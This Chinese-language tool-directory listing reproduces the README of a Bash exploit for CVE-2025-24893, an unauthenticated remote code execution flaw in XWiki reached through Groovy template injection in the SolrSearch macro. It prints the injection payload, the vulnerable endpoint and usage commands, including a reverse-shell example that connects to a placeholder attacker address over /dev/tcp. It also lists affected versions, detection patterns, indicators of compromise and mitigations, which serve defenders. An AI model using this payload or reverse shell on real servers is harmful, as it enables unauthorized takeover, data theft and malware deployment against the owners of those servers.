Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
XWiki-Platform-RCE-CVE-2025-24893 — Bash 漏洞利用,针对 CVE-2025-24893,即 XWiki Platform 中的未认证远程代码执行(RCE),利用 SolrSearch 宏中的模板注入来执行任意系统命令。 | Kitploit
工具/GitHubGitHub/0xdtc/xwiki-platform-rce-cve-2025-24893
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制Payload 开发
GitHub0xdtc/xwiki-platform-rce-cve-2025-24893

XWiki-Platform-RCE-CVE-2025-24893

Bash 漏洞利用,针对 CVE-2025-24893,即 XWiki Platform 中的未认证远程代码执行(RCE),利用 SolrSearch 宏中的模板注入来执行任意系统命令。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
359个月前尚未审核
分享

XWiki Platform 未授权 RCE 漏洞利用工具

概述

本脚本是一个重新设计的 Bash 实现,用于利用受 CVE-2025-24893 影响的 XWiki Platform 版本。它利用了一个关键的未授权远程代码执行漏洞,该漏洞允许攻击者通过 SolrSearch 宏中的模板注入缺陷执行任意 Groovy 代码。

原始的 Python 漏洞利用实现由多位安全研究人员创建,此处针对 Bash 用户进行了改编,简化了执行流程并增强了可用性。

漏洞详情

  • 发现者:John Kwak(Trend Micro 的 Zero Day Initiative)
  • CVE:CVE-2025-24893
  • CVSS 评分:9.8(严重)
  • 参考资料:
    • XWiki 官方安全公告 (GHSA-rr6p-3pfg-562j)
    • CISA 已知被利用漏洞目录
    • VulnCheck - XWiki CVE-2025-24893 已在野外被利用
    • OffSec 博客 - XWiki 中的未授权 RCE
  • 描述:该漏洞源于 XWiki Platform 中 SolrSearch 宏对输入清理不当。当通过 RSS 媒体端点访问时,该宏未能正确验证和清理用户提供的 text 参数,使攻击者能够在无需认证的情况下将恶意 Groovy 代码注入到渲染管道中。

受影响与修复版本

受影响版本

  • XWiki Platform:5.3-milestone-2 至 15.10.10
  • XWiki Platform:16.0.0-rc-1 至 16.4.0

修复版本

  • XWiki 15.10.11 或更高版本
  • XWiki 16.4.1 或更高版本
  • XWiki 16.5.0RC1 或更高版本

功能特性

  • 未授权 RCE:无需认证即可执行任意系统命令。
  • CSRF 令牌绕过:利用模板注入,无需 CSRF 令牌。
  • 后台执行:在目标服务器上异步运行命令。
  • 简单命令行界面:易于使用的 Bash 脚本,依赖最少。

前提条件

  • 依赖项:
    • curl:用于发送 HTTP 请求。
    • jq:用于对负载进行 URL 编码。
    • Bash shell。
  • 测试环境:Linux 操作系统,使用 Bash。

使用方法

赋予执行权限:

root@kitploit:~
chmod +x CVE-2025-24893

使用必需参数运行脚本:

root@kitploit:~
./CVE-2025-24893 <目标URL> <命令>

参数说明

参数描述
<目标URL>目标 XWiki URL(例如 http://example.com 或 https://xwiki.example.org)。协议可选。
<命令>在目标服务器上执行的系统命令。

示例

检查目标是否易受攻击(执行 id 命令):

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "id"

获取系统信息:

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "uname -a"

创建测试文件:

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "touch /tmp/pwned"

反弹 Shell(替换为您的 IP 和端口):

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'"

脚本工作流程

  1. 命令行参数解析:

    • 验证是否同时提供了目标 URL 和命令。
    • 如果未指定协议,自动添加 http:// 规范化 URL。
  2. Payload 构建:

    • 构建一个 Groovy 代码 payload,使用 .execute() 执行指定命令。
    • 使用 XWiki 宏语法包装 payload:}}}{{async async=false}}{{groovy}}<code>{{/groovy}}{{/async}}
  3. URL 编码:

    • 使用 jq 对 payload 进行 URL 编码,以确保正确传输。
  4. 漏洞利用:

    • 向易受攻击的 SolrSearch 端点发送 HTTP GET 请求:/xwiki/bin/get/Main/SolrSearch?media=rss&text=<编码后的payload>
    • 命令在目标服务器后台执行。

技术细节

利用机制

漏洞利用链如下:

  1. 模板注入:攻击者构造一个恶意的 payload,包含用 XWiki 宏语法包装的 Groovy 代码。
  2. 端点定位:将 payload 发送到易受攻击的 SolrSearch RSS 端点。
  3. 代码执行:注入的 Groovy 代码在服务器端未经认证即可执行。
  4. 系统沦陷:攻击者以 XWiki 应用程序的权限获得任意代码执行能力。

Payload 结构

root@kitploit:~
}}}{{async async=false}}{{groovy}}'<command>'.execute();{{/groovy}}{{/async}}
  • }}} - 关闭任何现有的宏上下文
  • {{async async=false}} - 确保同步执行
  • {{groovy}}...{{/groovy}} - 包装恶意 Groovy 代码
  • '<command>'.execute(); - 执行指定的系统命令

概念验证

易受攻击环境搭建

出于测试目的,您可以使用 Docker 搭建一个易受攻击的 XWiki 实例:

root@kitploit:~
docker run -d -p 8080:8080 --name xwiki-vulnerable xwiki:15.10.10

漏洞利用演示

root@kitploit:~
# 等待 XWiki 启动(可能需要 1-2 分钟)
./CVE-2025-24893 http://localhost:8080 "whoami"

影响

成功利用此漏洞,未授权的攻击者可以:

  • 在服务器上执行任意系统命令
  • 读取、修改或删除敏感数据
  • 完全攻陷 XWiki 安装
  • 在网络中横向移动到其他系统
  • 部署加密货币矿机或其他恶意软件
  • 建立持久化的后门访问

实际利用情况

根据 CISA 和多家安全厂商的信息:

  • 活跃利用:CVE-2025-24893 正在野外被积极利用
  • 攻击活动:VulnCheck 检测到部署加密货币矿机的两阶段攻击链
  • CISA KEV 目录:于 2025 年 10 月 30 日被添加到已知被利用漏洞目录
  • 广泛扫描:针对易受攻击实例的大规模互联网范围扫描

检测与缓解

检测

监控对 SolrSearch 端点的可疑请求:

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*

查找包含以下模式的请求:

  • {{groovy}}
  • {{async}}
  • .execute()
  • 上述内容的 URL 编码变体

入侵指标(IoCs)

  • XWiki 应用程序用户产生的意外进程
  • /tmp 或其他可写目录中的新文件
  • 向未知 IP 的出站网络连接
  • 加密货币矿机进程(高 CPU 使用率)

缓解措施

  1. 升级 XWiki 至已修复版本:

    • 15.10.11 或更高版本
    • 16.4.1 或更高版本
    • 16.5.0RC1 或更高版本
  2. 应用临时解决措施(如果无法立即打补丁):

    • 通过 Web 应用防火墙(WAF)限制对 SolrSearch 端点的访问
    • 如果不需要,禁用 SolrSearch 宏
    • 实施网络分段以缩小暴露面
  3. 监控是否被攻陷:

    • 审查日志,查找漏洞利用尝试
    • 检查未经授权的文件修改
    • 扫描加密货币矿机和后门

局限性

  • 命令在后台执行,输出可能不会立即可见。
  • 验证命令执行需要使用侧信道方法(例如创建文件、网络连接)。
  • 目标需要启用 SolrSearch 宏(默认配置)。

致谢

  • 漏洞发现者:John Kwak(Trend Micro 的 Zero Day Initiative)
  • 原始 Python 漏洞利用作者:多位安全研究人员
  • 改编脚本:由 [0xdtc] 使用 Bash 重新编写

免责声明

本脚本仅用于教育目的。未经您拥有或明确获得测试权限的系统所有者许可,擅自使用此工具是非法且不道德的。请负责任地使用。

在测试之前,您必须获得系统所有者的明确书面许可。

本工具的作者不对因使用本脚本导致的任何误用或损害负责。用户全权负责确保其拥有适当的授权并遵守所有适用法律和法规。

下载工具